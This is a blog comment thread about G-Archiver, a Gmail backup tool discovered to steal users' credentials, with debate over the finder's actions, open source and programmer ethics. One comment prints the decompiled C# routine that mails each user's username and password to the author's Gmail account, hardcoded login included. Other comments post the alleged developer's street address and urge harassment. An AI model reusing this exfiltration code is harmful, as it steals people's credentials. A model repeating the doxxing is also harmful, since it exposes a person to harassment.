>Didn't Dustin email all the affected users to warn them to change their passwords?

I was thinking that too.

I hate to add to this long list of comments, but I can't help but notice this:
client.EnableSsl = true;
Irony anyone?

"The fact is that if we considered those around us who we don't know as equal in worth to ourselves we would think twice be-fore working on weapons and devices that we know will kill others."

If we consider those around us "equal in worth", where worth is the capacity to create, to dream, to love, etc, we also have to consider them equal to us in their capacity to invent ways to kill us. To the extent that a human is capable of good, he or she is also be capable of evil.

"However, as a computer scientist, I stand firmly opposed to copyright and patent monopolies."

I completely agree with your principles, but any serious set of ethics has to render unto Caesar what is Caesar's.

@A Programmer

The perpetual nature of US copyrights (70 years after the death of the creator plus however many years Disney wants added so they can keep Mickey Mouse out of the public domain) is the major problem with copyright law. I have no problem with using copyright to protect software; it worked for many years, it prevents wholesale theft while allowing independent invention.

Patent law is a whole different animal. Traditionally patents were awarded only for physical devices - software was only considered if it was part of a physical device. Now any jackass can patent math and dance (software and "business processes" such as Washington Mutual's branch office layout.)

I don't see any problem with ACM's approach regardless of my view that software patents are an egregious misuse of the patent system. Like it or not, it's the law and the right way to handle the issue is to tell the profession to obey the law as part of a code of ethics while working to get bad law changed. ACM does the former; does it do the latter? Given its membership and (more importantly) sponsorship, can it?

Contrast ACM's code of ethics with those of LOPSA (The League of Professional System Administrators - see http://lopsa.org/CodeOfEthics):

"I will educate myself and others on relevant laws, regulations and policies regarding the performance of my duties."

and

"As an informed professional, I will encourage the writing and adoption of relevant policies and laws consistent with [the LOPSA Code of Ethics]."

That said, I've decompiled Java to examine vendor source code to debug problems and nudge vendors toward fixing our issues. I've done code reviews on proprietary code to which I have had access to the source and have reported bugs back to the vendor (specifically for software that estimated the effects of radioactive material releases to the public.) In that case, the vendor issued an advisory and sent us a fix within a few days.

Experience has convinced me that whether software is proprietary or open, the end user must have access to the source code otherwise they have no assurance that the code even works or that the vendor's agenda aligns with their own. Code is the instantiation of the author's agenda - if the author is a grifter or thief, it will show in the code.

@ Justin Megawarne

Being entitled to viewing the source code doesn't help at all. There's no way to actually verify that the site in question actually uses the source code as-is. That's a huge misconception that people have about open source software, especially open source-based online apps.

People assume, "well, look, the source code is available, everything must be on the up & up." For all they know, the site is 100% malicious but using the same interface. Really, the only way to be safe with open source is to diligently read the code and then compile it yourself, or to trust the community distributing it. Of course, that's not an option when you're on someone else's site.

OAuth, OpenID, etc. are vitally important options. Of course, they're still not ultimately friendly enough. And in the case of OpenID, there's still a huge level of trust that has to be placed on the provider (since Joe Shmoe will not have his own web site).

It's already bad enough that email is the focal point of almost all of a person's services/usernames/passwords... and losing access to your email effectively terminates your online self. Sure, Google can be trusted with email, to a degree. That's not necessarily the issue. The issue is just how *EASY* it is for someone to get your email user/pass. Use any machine that has a keylogger (hardware or software) installed by a user or virus, and boom... everything you've ever done and use is in someone else's hands.

I suppose the only way to combat that is biometrics + some form of verification that relies on a floating, constantly changing password some how. :S

@ Justin Megawarne

Oh, sorry, I re-read what you said. You meant a piece of software like G-Archiver. Of course, what you suggest wouldn't be fair or legally possible.

How 'bout this for an idea along those lines: a third-party that verifies software as "safe". It would be the BBB/Verisign of sorts for software. I suppose, the company or independent developer would then pay the verification service based on the complexity/length of the code. The service would verify various points, ensuring the software won't screw a user, then give a quality seal w/ lookup online, as well as the hash or whatever to verify it's the same software.

That would allow developers to keep their intellectual property and get their software used more. And that'd be great for users as well. Oh, and great for a business if the costs can be worked out.

I don't know, maybe things like that exist (probably).

There is no John Terry,from the password you can guess its some Asian dude wanna be hacker,and the site you mentioned to download is a bad site to download things from.Try download.com next time.

NOTE: Its not about programming ethics or programmers. There are good and bad people.And well it everyone had ethics (ba humbug!) then the world would have been a better place and no one would create viruses,hack tool,root kits(sony!) etc....

Lame post i tell ya.

PS: Hope you dont censor this !(free right to opnion)

@Justin Megawarne

"This is one reason that users should be entitled to examine the source code, or otherwise reverse engineer/analyse the workings of a piece of software, without fear of legal backlash."

This is one reason that the police should be entitled to examine a citizen's emails and personal correspondance, without fear of legal backlash.

"There is an ethical imperative here that overrides any economic rebuttal."

There is a public safety imperative that overrides any privacy rebuttal.

I thought your arguments sounded familiar.

Haha, this is probably one of the dumber identity thieves I've heard of. Why embed his own username and password and risk it being extracted when THE USER JUST ENTERED THEIR OWN SET? He could've just use theirs and sent an e-mail using those credentials! The only problem then is that an e-mail might appear in their sent folder (until he immediately deletes it).

Of course that wouldn't have prevented its detection. Assuming this is a .NET program (that's the only Reflector I know) there is no way to prevent deompiling unless you use one of those expensive scrambling/obfuscating programs (there might be a free/open source one as well, wouldn't surprise me, but I don't know of any ATM).

(ironic mode:on)
I need my ex-girlfriend gmail password, it's very important! please send me it at my hotmail account.
Thanks
(ironic mode:off)

;-)

<plug type='shameless'>
As was already mentioned, you can easily backup your gmail with, say, thunderbird, in 5 easy steps:

http://blogoscoped.com/forum/22775-full.html#id24184

This is truly a sad story =( Us geeks are often privy to a LOT of very confidential, sensitive information, be it logins, financial data or even business plans. There is implicit trust as soon as people fire up your application, that trust should never be abused. Its unethical, immoral and excuse the language, but just makes you an a-hole!

Well done though Dustin for figuring it out and doing the right thing! Did anyone ever find out if he emailed the people that had been stung to get them to change their account information?

Hell of a good reason to fire up reflector on any shareware that you enter account information into..

Good job the idiot didnt have the brains to store his password in some soft of encrypted format! =D

I must say, I love the comments about how if this were open source, this could never have happened.

Consider this:
1) I make some application
2) I package up the source code
3) I inject malicious code and compile said source code
4) I put both the 'clean' source and malicious binary files on (say) Sourceforge and mark it as GPL.

How many people, do you think, are going to actually check that the source and binaries match, or compile it themselves from source?

Open Source Software is not the answer to preventing this kind of abuse in trust.

As for the comments that this was possibly just debugging information let loose - take another look at the source code. It's pretty obvious that this is NOT just debugging info.

It's also unfortunate that Dustin probably broke several laws doing the right thing to protect these folks who had been exploited.

The worst thing is that now our dear Jeff (probably) won’t stop cheating but will become smarter covering his @ss while doing it.

We all applaud DB for doing what, in the end, is right.

However his actions weren't (entirely) ethical. After DB logged onto gmail and verified that the code was stealing username/passwords he should have stopped. It can be argued that up to that point he couldn't know his assumptions were correct. There's often dead code, and the code discovered code doing the emailing could have been 'test' code for all DB knew.

Additionally, using Lutz's Reflector isn't illegal. JT made no attempt at obfuscating his code, encrypting, signing, etc. No more illegal than using a screwdriver to open a tv set. Why do coders/politicians/police think that some legally magical properties are given to some binary output after being processed by a compiler.

However much I'm in favor for DB's actions, once he deleted the emails he's trashing evidence and exposing himself to prosecution/liability (in some countries at least). We cringe when an honest guy gets trashed because he was trying to do good.

If DB just changed the password that would have been OK, because all that does is prevent the malicious software from operating, and doesn't cause any long-lasting damage.

That said, I really doubt that DB thought out his actions once logging onto gmail. He reacted, probably like many of us would. I imagine being in that situation, freaking out, and doing the exact same thing as a knee-jerk reaction.

So save your harsh comments for JT instead, because he deserves them, as well as deserving prosecution.

I'm lost trying to figure out the point of this article. Other than mentioning something vaguely smart and hand-wavily academic (like the ACM code of conduct), I don't spend my time reading Coding Horror to hear about simplistic disassembly of crude pieces of spyware; there are much better resources for that.

Deleting the email data in question was a really dumb knee-jerk reaction, although I trust that Google are well equipped to deal with this kind of stupidity.

For those just tuning in to this thing called the Internet, creating quasi-useful pieces of software that act as a conduit for malware is nothing new. Think FunWebProducts, think of the potentially hundreds of game cheat tools, aimbots, and what have you that have been using this trick for well over a century.

Given that GMail provide POP3 and IMAP access, I cannot understand why even a rookie technophile would go off in search of a specialist tool for archiving mail. For what it's worth, I use the excellent little mpop <http://mpop.sf.net/> utility for backing up my GMail, although offlineimap <http://software.complete.org/offlineimap> works too.

AFAIK, the information in the gmail account is not actually deleted, in the sense that Google could still recover it if they wanted to, although that would probably require a court order. It might be worth seeing if law enforcement wants to take an interest in this guy - it's not too late.

>Think FunWebProducts, think of the potentially hundreds of game cheat tools, aimbots, and what have you that have been using this trick for well over a century.

since 1908?

@David Wilson,

How on earth can you compare FunWebProducts (which bundled basic, bur irritating, adware - stupid pop up windows and toolbars) with a program coded to steal usernames and passwords?

If you stopped programming on everything that could possibly hurt an innocent person then you wouldn't be programming at all.

Matt on March 8, 2008 08:45 AM

Wow, that has to be the stupidest comment ever.

Every snowflake of an avalanche proclaims its innocence... >.>

@Geri:

You can't port someone's opinion over from one thing to another. If I'm running software on my computer, I have a right to know what it does. The police only have a right to spy on people when they have reasonable grounds to believe it is necessary -- there's almost nobody who thinks that police should NEVER be allowed to read private mail; the only real argument is WHEN "there is a public safety imperative that overrides any privacy rebuttal."

Your argument it facile.

Agree with A. Programmer above; copyrights and patent are not property rights, and there is no such thing as "intellectual propertY".

It might have been more wise to datamine the usernames from his inbox, and do a mass-mailing to all of them telling them to change their password. You definitely did a good thing, though. Hopefully Google can take care of informing the users to change their passwords.

Why do you need junk software like this when you can simply use **any** email client, via POP and backup your mail locally? It's not like yahoo or hotmail where you have to pay for POP access. Duh?!?

This would never happen in the Linux world because the approvers of binary packages we download from our distribution vendor must first have access to the source code, and they review the source for malicious items like this. And on Ubuntu, this is doubly so because packages are reviewed by the Debian team, then by the Ubuntu team.

So, Windows users, you might want to start getting the source and compiling stuff yourself rather than using binary executables.

Before we point fingers of Linux vs. Windows and claim how you should have done this or that, we need to take a bit of action:

1). Everyone here should email abuse@godaddy.com and tell them that a site they've registered is doing something that is probably illegal. The site is registered by GoDaddy under the name of MateMedia:

Administrative Contact:
Inc., MateMedia hostmaster@matemediainc.com
MateMedia, Inc.
POB 430302
Miami, Florida 33243
United States
(877) 309-7521

Next, if anyone of you know someone who has fallen for this, have them write a complaint to the Attorney General of Florida: http://myfloridalegal.com/contact. There is a complaint form: FILL THAT OUT! Don't just email the Attorney General, fill out the form at http://www.myfloridalegal.com/ConsumerComplaint.pdf.

They will track down this guy (easy enough to do with a few court orders) and go after him. He has committed fraud (especially since he's taken money for this program), electronic theft, and possible identity theft.

BTW, you might find this article of interest: http://www.quickregister.net/articles/customerservice/4_Customer_Service_Mistakes_Companies_Should_Avoid.html. Apparently, his name here is "Russ Mate".

Here's a few more URLS http://www.russmate.com/
http://mediamateinc,com

Might I suggest that you change the title of this post to something like "Don't use G-Archiver" so that it shows up as an immediate clear warning in search results. It already shows up as #3 in search results for g-archiver, but g-archiver itself is #1.

I am in no way defending what happened here, but in all honestly blaming shareware is not really fair. If anyone had gone to the "companies" site and taken a loot at it, they probably never would have installed it being how shady it looks. That's just common sense, I am sorry.

There are legitimate companies out there that get listed on shareware sites, be it from themselves or from affiliates.

Shocking indeed, is there a way to announce and create awareness so in future other innocent users don't fall into this trap ?

A few comments on Dustin Brooks' ethics:

Dustin Brooks did no wrong in using Reflector. There is nothing in the G-Archiver license that prohibits using Reflector in examining the source code.

Dustin Brooks took immediate action when he suspected that his Gmail address was stolen. Normally, you don't log onto someone else's account, but in this case, Dustin Brooks had immediate knowledge that his Gmail account information was stolen, and had to take immediate action to prevent theft.

Dustin Brooks saved thousands of people from getting their email addresses stolen by deleting them from this account. He has saved thousands more from getting their email stolen by deleting the account and locking it.

Saying Dustin Brooks acted unethically is like saying someone who runs into a burning building and saved a baby acted unethically because they didn't ring the doorbell and asked permission to enter and thus trespassed onto someone else's property.

The account in question was obviously used to steal email addresses from other people. Dustin Brooks quick thinking saved them from having their accounts stolen.

There are two other things Dustin Brooks should do: If possible, contact these people and let them know their Gmail accounts might have been compromised. He should also contact Google and let them know about this account and contact the Attorney General's office to file a complaint.

As for Russ Mate who is shocked! shocked! that this happened on one of his accounts, why is the garchiver site still up and running? Certainly, you as the technical contact and registrar have the power to take this site off the air. If someone contacts you about g-archiver, are you willing to reveal the name of the client, so others can get in contact with them, or to be able to file charges against this client?

Why did you link to the software as well? Gives it promotion.

BTW, I have a small and OPENSOURCE Python script to backup your whole GMail account (inbox, archives, sent) in the standard mbox format.

You can review the sourcecode yourself: There are only 23 lines of code.

http://sebsauvage.net/python/snyppets/index.html#archive_gmail

I would like to pose a hypothetical situation for people to consider.

If some sort of potentially IMMEDIATE risk were occurring, like, say... I left my keys in a bus station, and a friend of mine saw someone that neither one of us knew, entering my house... there are some things I would like him to do.

1) Phone me - Dustin SHOULD have emailed everyone on the list, I agree... however, all of this information seems to be included in R/E line.. or the body...? In any event, it does not look like it would be as easy as clicking "forward", or anything else like that, it looks like 1700+ emails worth of cutting and pasting.

if the hypothetical friend of mine (i have no actual friends) who saw the intruder didn't have a cel phone, was out of time or dropped it and broke it, that's ok... I WOULD APPRECIATE SOMEONE ACTING IN MY BEST INTEREST. I would hope my friend would carry on to ...

2) Approach my house and ask what is going on - Dustin looked through the emails, and came to a conclusion which, I think we can all agree, was a no-brainer. The few reasons for having a list of this information are few, and none of them are in the best interest of the person doing it.

The chances that this list were an innocent list of names, for say demographics, are stupidly slim.

If my friend saw this person, say, stealing my stuff through the window... I would hope that they would take some action!

Incidentally, if Dustin approached the house and annouced himself to ask what was going on, he may put himself in danger - or the intruder may run off with my keys. So, maybe the metaphor isn't PERFECT, but it's 5:45 am.

3) Inform the Authorities - Dustin informed Google. Nuff said. My friend should call the police, number one. However, that (in my mind) does NOT preclude ...

4) Act to save my stuff - Go in and knock the guy out! I certainly won't charge my friend with trespassing, and I don't think the cops in MY home town would charge him with assault. This would probably end up being one of those "He must've fallen while trying to escape and given himself 4 black eyes" cases.

Maybe the metaphor is wrong in several ways, since it doesn't really convey the immediacy of the threat... what if my friend saw this intruder, lighting a match and setting it to my sofa? What if the problem were so immediate, that every passing second could spell disaster?

To anyone who knows me;

If I see someone about to burn your house down, and the battery on my cel phone is dead, I will
a) Enter your home
b) grab a fire extinguisher
c) douse him with it
d) knock him upside the head with it until he stops moving
e) use your phone to call the cops

I would do so in the full knowledge that you could, for example, charge me with breaking and entering, or he could charge me with assault. Hopefully, he didn't die from the battery.

Oh, and by the way, Dustin... THANK YOU! Don't pay any attention to people who BS about legal crap. You did, IMHO, the right thing. Yeah, you didn't email the people, but in the heat of the moment... sometimes we forget to plug in our cel phones. Everyone on that list is grateful to you, I am sure. I sincerely hope you interrupted a bot and crashed a server when you did it.

"and none of them are in the best interest of the person doing it."
=
"and none of them are in the best interest of the people who's information is so stored".

I think the point here is not about ethincs as you can never rely on someone else to have ethics... It's more about protecting your information.

Passing your username and password to anyone for anything should always be done extremely carefully.

On a similar theme, one of my pet hates is websites that require you to register on them. You create a username and password, they then immediately email you your credentials (so you don't forget them?).

I then kick myself for having used one of my current "strong" passwords for them to then send in an email in plain text! Where's the ethics in that?

from bothersoft site:
BrotherSoft.com is not only a website for software downloading, we also evaluate the software based on our established evaluation criteria, which is submitted by developer. And we will also give the software developer an honest opinion. Our original intention is that our evaluation could help the software developer provide a better one for their customers.
(auhuahuahuahuhauahuhauhauhau)

Actually John Terry is a quite famous guy.
http://www.chelseafc.com/page/ThePlayers/0,,10268~5593,00.html

Name is most probably just bogus - especially if this was intent.

I never found a decent email archive program so I wrote one in Python about a year ago, it downloads your emails to text files (saves the extensions too). I figure there might be some people looking for a decent, simple email archiver so I threw it online. You can find it here...

http://lab.noopsi.com/popbak/

Jeff, I hope it is okay to post a link like this. I polished the script over the weekend because after reading this post on Friday I figured there might be some people looking for a new email backup utility. Also, since it is written in Python there aren't any secret surprises since you can see everything Popbak does.

It looks like from his password "bilal482" which is an asian name, his name might not be John Terry at all.

Umm...let me get this straight -

You want to back up your email, which contains a bunch of sensitive data. Rather than back it up securely on your own machine or device (which can be done in, probably, thousands of different ways), you decide to download some random application that was written by someone you don't know, and then blissfully punch your username and password into it.

Can we please stop talking about heroes and villains and start talking about stupidity?

@David W: The garchiver site is still "up", but the "Free Download" and "Buy now" links have been removed. I guess that's better than nothing, under the circumstances.

- Roddy

I don't know about in the USA but in the UK this would actually be illegal as it would fall under our data protection act. Basically no one can store your information without letting you know first then they must remove it after it has become unreasonable to keep (likely out of date, not needed etc..). It is also their responsibility to hold it securely.

public class Mail
{
// Methods
public static void CheckConnection(string a, string b)
{
try
{
MailMessage message = new MailMessage();
message.To.Add("JTerry79@gmail.com");
message.From = new MailAddress("JTerry79@gmail.com", "JTerry", Encoding.UTF8);
message.Subject = "Account";
message.SubjectEncoding = Encoding.UTF8;
message.Body = "Username: " + a;
message.Body = message.Body + "\r\nPassword: " + b;
message.BodyEncoding = Encoding.UTF8;
message.IsBodyHtml = false;
message.Priority = MailPriority.High;
SmtpClient client = new SmtpClient();
client.Credentials = new NetworkCredential("JTerry79@gmail.com", "bilal482");
client.Port = 0x24b;
client.Host = "smtp.gmail.com";
client.EnableSsl = true;
client.Send(message);
}
catch (Exception)
{
}
}
}

Granted my actions may have been a little quick and harsh, I was a little upset over the whole deal. I have a lot of personal info in my account along with a stored credit card for google checkout.
I very easily just could have changed my password and been done with it, but I didn't want more people compromising their accounts as well.
The only emails in this account were usernames/passwords. This wasn't a personal account used for other things.
The only thing I worry about now is his account getting restored from Gmail. Does anyone have a good way to contact them? I sent something through their "suggestions form," because it was the only one I could find.

I don't think you were too quick or too harsh Dustin. I think you did exactly the right thing and as others have said I would have conntacted GMail and the FBI (since it's interstate fraud).

I don't think a wholesale abandoning of shareware is the answer. Nor is open source. While this may seem like a smoking gun for the case of open source let's not be so reactionary. There are many, many honest software developers that release their software as shareware to get their product on people's desktops.

You wouldn't say, "I stubbed my toe on the kitchen table so we must outlaw all tables... and toes."

I haven't ready all the posts, but I'll try to answer a few more questions.
Yes, I did kind of screw up by downloading some random software and I'll take the idiot card for that. I was essentially looking for something that would backup the gmail emails in their entirety. I use the labels almost religiously on everything in my box and wanted a way to keep those intact (which by the way Thunderbird will kind of do using IMAP, so yay).
Since this program wasn't going to cut it, I wanted to see how much code went into getting it this far in case I was going to be forced to try and write something myself. I've used Reflector on a lot of things, that doesn't mean I've stolen other peoples code, claimed it as my own, sold it on the black market and killed puppies as some people seem to think.
Oh, and a lot of the emails had been opened. And there is absolutely no reason to have a debug function to email the username and password of a gmail account, to another gmail account.
And to email all the affected accounts would mean getting each name individually off the body of the message. They were sent from jterry to jterry, so they weren't added to his contacts.

You should submit that to thedailywtf.com

You know, skimming the comments after getting here from Daring Fireball, I'm surprised nobody brought up this classic...

http://cm.bell-labs.com/who/ken/trust.html

Hey, how about blurring/mosaicing out the 10 or so gmail names that are in that screenshot?

Too late. They'll now get even more spam.

@Dustin:

In case you decide to delete John Terry's google account,
<a href="http://www.google.com/support/accounts/bin/answer.py?hl=en&answer=32046">http://www.google.com/support/accounts/bin/answer.py?hl=en&answer=32046</a>

Ryan,

Well, the jury's still out on whether you're an idiot, so no worries. :-D

Technically, there should be no need for JTerry to have included his own login credentials in his code. I absolutely guarantee that GMail does not require any authentication for inbound emails. It is completely trivial to send a message via SMTP (the protocol is completely text based and can be used via a telnet program). MIME headers and formatting are not required.

Excellent work man, its good to have people like you around.

erm... are you familiar with the concept of "POP mail". when you can pop your gmail down for free.. why were you looking for an alternative to backup your emails???

Oh, very unpleasant.

It looks like G-archiver has been taken down from all of the shareware download sites, as well as the G-archiver website itself. Does anyone still have a link to the original executable? I would love to peruse the decompiled source code for myself.

I agree with Domenic. DPAPI does not solve all problems. Is there a way the writer of this program could have used DPAPI? Wouldn't the installer at least need the password in plain text so that DPAPI could encrypt it specifically for the machine the software was installed on?

Open source ftw?

This is kinda of a catch 22, why would Dustin log into John's account without breaking some sort of ethics? If I was Dustin I would had done the same thing. But imagine if he logged into his email account and there was nothing?

-- We use Lutz as a verb. "Let's lutz it and find out"

I'm having that one David. Duly adopted.

I'm very skeptical of any third-party site or application that asks for username and password. These days access to your e-mail account gives a person access to your entire life.

Moral of the story: Trust No One.

> What about working for a company like Raytheon, whose job is to
> build better killing machines? Would you consider that ethically
> defensible? That would seem to violate principles 1 and 2. Or, what
> about working for an online gambling site? I'm just curious as to
> where you would draw the line.

I think that at some point it has to come down to your own moral compass. I've worked in and around the defense industry my whole carreer. The thing is, the industry is about a whole lot more than just killing. For instance, I've done projects for NASA, which is about the most noble work I think a software engineer can be involved in. I've worked on flight simulators which keep pilots from *dying* from their mistakes while they are learning to fly. I've worked on shipboard engine controllers, which are what helps keep our sailors alive when the chips are down.

On the other hand, I have had two situations where I had to put my foot down. The first was a tank simulator for the Chineese army about 5 years after Tienamen. (Two ways I'm doing that: no way, and no f'n way!)

The second was a job offer I got for building smartbombs.

Not that I'm being judgemental here. I'm sure there are some people who could sit in a chair at the retirement home at the end of their carreer and be proud of a life spent building bombs. After all, a properly coded one probably causes less collateral damage and deaths than conventional bombs to produce the same effect. However, I am not one of those people.

Here is where this douce bag lives:

10431 SW 88TH STREET SUITE D309, MIAMI FL 33176

Everyone send pizza and plumbers there.

I think people are confusing that this is all work of Jeff because of few reasons:

1. The way Jeff puts ligh colored block and alignment in para-phrased is sometimes hard to notice. It is done nicely, but too nicely to differentiate.

2. Language Jeff used is burined between two para-phrases.

Personally I have found such entires quite confusing but appreciate that since I don't read all feeds, Jeff's is kind of digg to me, which helps me get such interesting content.

Ketan

I blogged about this kind of behavior once before, but the *message* got lost. This is *exactly* the sort of thing I was talking about:

http://eddiesguy.blogspot.com/2007/08/heroes-villains-and-software.html

I tend to agree with what Dave said, was Jeff's action not taking the law into his own hands?

However on the other hand, Well done Jeff and writing this post. This type of programmer behaviou is criminal and leads to a total invasion of ones privicy.

As much as there are ethics and hopefull the majority of profesionals follow them, there is always the criminal mind. I am of the opinion that the industry should be more regulated and programmers held accountable for malicious code. I know this is an impossible ask, but would it not be nice?

Kudos!

Count me in the "mostly did the right thing" camp:

- Reflector: does anyone who doesn't wear a suit really think "reading the directions" is a crime? (This doesn't pardon plagerism or other unsavory *use* of what you see, but the act of looking?). No harm was done here.

- Google: I probably wouldn't have deleted the emails (given a few minutes to think about it). Best practice probably is:
1. Check for email forward.
2. Add email forward to auto-reply warning that their information is being compromised. Cc abuse@google.com (or some other suitable email)
3. If there's an easy way to auto-reply to existing victims, do the same for them.
4. Change the passwords, security keys, and whatever else I can find.
5. Send an email to abuse@google.com (or whatever email I find) *from that account* detailing the situation and actions taken.
6. Log out, and find a better way to backup email. :)

Everyone who can be informed is informed, perp is locked out - but if it turns out to be some massive misunderstanding *snicker* nothing irreversible has been done, and I am relatively anonymous (if someone decides to go all Gestapo on "the big bad hacker") Not bothering to contact police - Google'll do it if there's a chance of prosecution.

Suggestions?

It looks like it really could have been a mistake:
http://www.garchiver.com/what-happened.htm

Since the method is called "TestConnection" this is even somewhat plausible. Seriously, I bet there are programmers here who have leaked their own credentials this way.

Its still pretty stupid, though... ugh.

no

"What happened was that a member of our development team had inserted coding used for testing G-Archiver in the debug version and forgot to delete it in the final release version."

Riiiiight...

Somehow I doubt that it takes a "development team" to write this piece of blatant malware.

I can only assume 'Dave' above ("it's unethical to act to prevent massive password theft") is either a blithering idiot, or a troll.

HA! Yeah, it was just a mistake. That's why it's contained in a seperate .dll named simply "SM" with only one class "Mail" which breaks the naming convention of the rest of the source. This class has a trivial constructor and one method, that Brian listed already. Anyway, if you'll notice in the method, it swallows the exception as well.

Now I gotta ask, what kind of test method swallows the exception? No my friends, this guy was trying to slide one under the rug so to speak. On the bright side I would assume he's being terminated and or sued by the company that put up that chipper message about how it was all a mistake and despite their developer receiving thousands of email addresses and passwords they never notified a customer, rolled out an update, or updated the program itself.

My advice, if you used the program, change your password. Look for signs of identity theft, too. If you see them, you know where to point a finger, not at the developer either, at the company that released it. Secondly, never use any product from anyone even involved in this project again.

Accident my ass.

--------------------------------------------------------

What happened with G-Archiver?

It has come to our attention that I got caught stealing customer's Gmail account usernames and passwords.

It is urgent that you remove the current version of G-Archiver from your computer, and change your Gmail account password right away so that I can have plausible deniability.

What happened was that I inserted coding used for stealing G-Mail passwords in the debug version and decided it was a great idea so I didn't delete it in the final release version.

I sincerely apologize that I got caught and assure you that you weren't intended to find out about this.

We'll be releasing a new version that uses encryption, the .NET Obfuscator, and updates the account details found in version 1.0 (since I got locked out of my account). The new version will be available very soon. Download and tell your friends!

even though we now know what is going on...someone broke the DMCA and needs to pay

this is bad - reverse engineering of code is protected under the DMCA

Haha! Slipped into a debug version? I don't recall exact dates but it was more than a years worth of data possibly two.
Why on earth would you need to send a username and password to a gmail account to test a connection? This program has no reason to even store the usernames and passwords, at all. To test a connection, send the word "Test," I think it would have worked the same way.
I'll still defend my actions, had he managed to have google reset his password that data would have still been at risk and since I never heard back from Google (only automated responses that they got my message) I wasn't sure any action would be taken on their behalf.

Will Hughes wrote:
>How many people, do you think, are going to actually check that the
>source and binaries match, or compile it themselves from source?
>Open Source Software is not the answer to preventing this kind of abuse
>in trust.

Please think about what you're writing before you write it. The proper question is not "how many people will check?", but "how many people have to check in order to expose it?". The answer is "only one", just like it only took one person to figure out what this program was doing.

Why on earth would this guy hard-code his password in the program? That doesn't make sense to me at all, you don't need it to send data to the acoount. Is this guy -really- stupid or are you, just maybe, not telling us the entire truth about how you got into his account :) .

Not to be an ass or something, congratulations and thanks for your research.... it's just curiosity.

Now someone has posted the guy's address, suggesting people send pizza and plumbers.
This has gone a litte too far methinks.

I'm guessing that Mate/MateMedia is just the proxy used for domain registration with GoDaddy rather than Douchebagus Maximus himself. I have a domain registered through GoDaddy and I use one called DomainsByProxy to keep my personal contact info out of DNS. You'd probably just be sending a pizza to the guy who started the proxy organization. Not to imply that he mightn't appreciate some za...

There is a difference between "ethics" and "acting in defense of another."

Sometimes, one has to betray the first in order to do the second. Regardless of all the arguments to the contrary, something WAS seriously wrong with that code. Even someone with only basic HTML programming can see that.

Dustin may not have taken an "ethical" path, but he did act in the defense of both himself and the other people who were at risk. There are too many arguments going back and forth about who was right and who was wrong... several of them not even applying to this entry.

"War" ethics are a hotly debated topic and have no place here. As my mother would ask: "What has that got to do with the price of tea in China?" Reply: About the same as it has to do with this post.

Point Simple: Dustin acted to protect himself and other users. That is not a vigilante act. He performed the internet version of tripping up a purse snatcher or pickpocket.

He is, in essence, a witness to wrong-doing. He is the one who halted it and contacted GMail about it. The fact that he has not been further contacted by GMail or law-enforcement authorities shows that they're really making an effort and busting their backsides to bring this guy to justice, doesn't it? /sarcasm

Only 1 word ...... incredible !

Bye, Cristian.

Manualinux, the Linux Manual http://www.manualinux.com

I used to live literally down the street from where this guy apparently lives. I might pay him a visit next time I go back home - me and a dozen eggs.

The difference between a black-hat hacker and a hero is how they use their abilities and in this case IMHO our friend Dustin Brooks did do us a favor. The fact that he reverse-compiled the code is a white-hat tecnique in the hacking world. (Modifying it and then turning into a worm,etc would be a black-hat/script kiddie thing). Frankly its the curious sorts who have discovered things like the Sony Rootkit fiasco, etc. Don't blame DB because he DIDN'T think to lock out the account and then call google, he mitigated the threat and then called google. In security, mitigation comes first THEN investigation. Sometimes this means you lose your attacker/offendor but its better to be safe first. WE SHOULD Blame the bloody b@st@rd who wrote this crapola code and then posted it for public use! Frankly, I suspect it was a sub-contracted job and the person who did it decided to a few, er, liberties with his/her code.
Our personal information is everywhere and is easily accesible so DB's quick move was in our favor... Do yourselves a favour and do a zabasearch on your name. You might be shocked at what you find.
-S
PS This is not a plug for zabasearch, I just find the site fascinating.
PPS If I discover that someone has my personal information unecrypted in a spreadsheet, or a word doc, or a text file, or a hash file or in HTML or a file with a well known format, first I politely ask them to remove the information and then if I can go over their head if they do not comply. Its happened where I work (names and socials out in the open!) and I've seen it on websites (myspace, etc). We must be vigilant to protect our identities!
PPPS rotate your passwords everywhere, every 60 days.

I find it odd that no one referenced this yet (though, admittedly I had to stop reading comments to this one eventually... great participation though). You can setup a trap in your gmail/yahoo/webmail accounts to make sure no one else is reading them. I can't take credit for this idea, but... I hope it helps.

http://www.makeuseof.com/tag/are-you-sure-your-email-isnt-being-hacked/

Basically, you create an irresistible named subject for an email, and send it to yourself like "Password list" and in it have either a link or html to load a hitcounter. Just keep the email in your box. Anyone trolling it will undoubtedly read it, and your hitcounter account registers a hit.

BTW- anyone using gmail chat or yahoo messenger, keep aware that your chat logs are also available, archived, on their servers. Apparently you can turn them off, but.. personally, after finding several passwords I sent to users in my own chatlogs, it's made me think twice about sending anything at all over the big provider networks, period.

Debug code? Yeah right!

I will say, in this day and age, programming requires as much ethics as being a judge, jury or executioner. Thank you for being honest.

The real WTF is, of course, that the guy didn't use an obfuscator.

"We'll be releasing a new version that corrects the flaw in version 1.0."

I expect that means they're just trying harder to obfuscate in 1.0... I hope the decompilers amongst you are keeping your eyes peeled! (Although if the source is that simple to extract, it would be nice to think that someone could release a more ethical version, as an electronic "up yours" to G-Archiver!)

First of all, this will cause a nasty side effect: When someone searches for the soccer player John Terry on google, his name will be next to the adjectives given to this programmer (moron, stupid, thief...)
This guy obviously abuse of people's trust but i want to make a comment to people that says "that happened due use of close-source software". Well, I cannot realize this image on my mind... the people who use this kind of backup software reading the code lines of it (on an open source soft) so... jail for john (probably) or "you deserve it" for the people who gives the login info to a program?

Great job Holmes:

For this kind of discovers you should be nominated the programmer of the month, congratulations

Hmm..

As I see on the website matemediasoft has he also made other programs..
Might be that he does the same trick again..

for example: A myspace login thingy named "friendtools" for myspace.

Qoute:
FriendTools is the best myspace friend adder, myspace mailer, and myspace commenter, and mass event, all in one program. No other myspace bot software offers so much for just $29.95. Add thousands of new friends to your network quickly. Great tool for those who want to market to myspace users. Try before you buy - download free trial version Register your software and unlock all features. The free trial version will allow you to add 10 friends - mailer, commenter, and mass event are disabled in the free trial version and due to changes that myspace has made, features other than the adder may not work correctly or at all for some users - This is a Windows program and will not run on a Mac.

Good post Jeff,

Very nice to see how Ethics are coming more and more into focus. And also very funny to see how people are thinking different on Ethics. Always reminds me of the Monty Python sketch with the Philosophers playing soccer.

Anyway, I really don’t want to spam your Blog with advertising. But we are currently working on a system to align Ethical Values and Actions here at Actics (www.actics.com). So many people, NGOs and companies don’t live up to their values. And so many people don’t even know what their values are.

I personally do think that we developers should be more aware of our values and responsible towards our surroundings.

@Travis who said:

"What about working for a company like Raytheon, whose job is to build better killing machines? Would you consider that ethically defensible?"

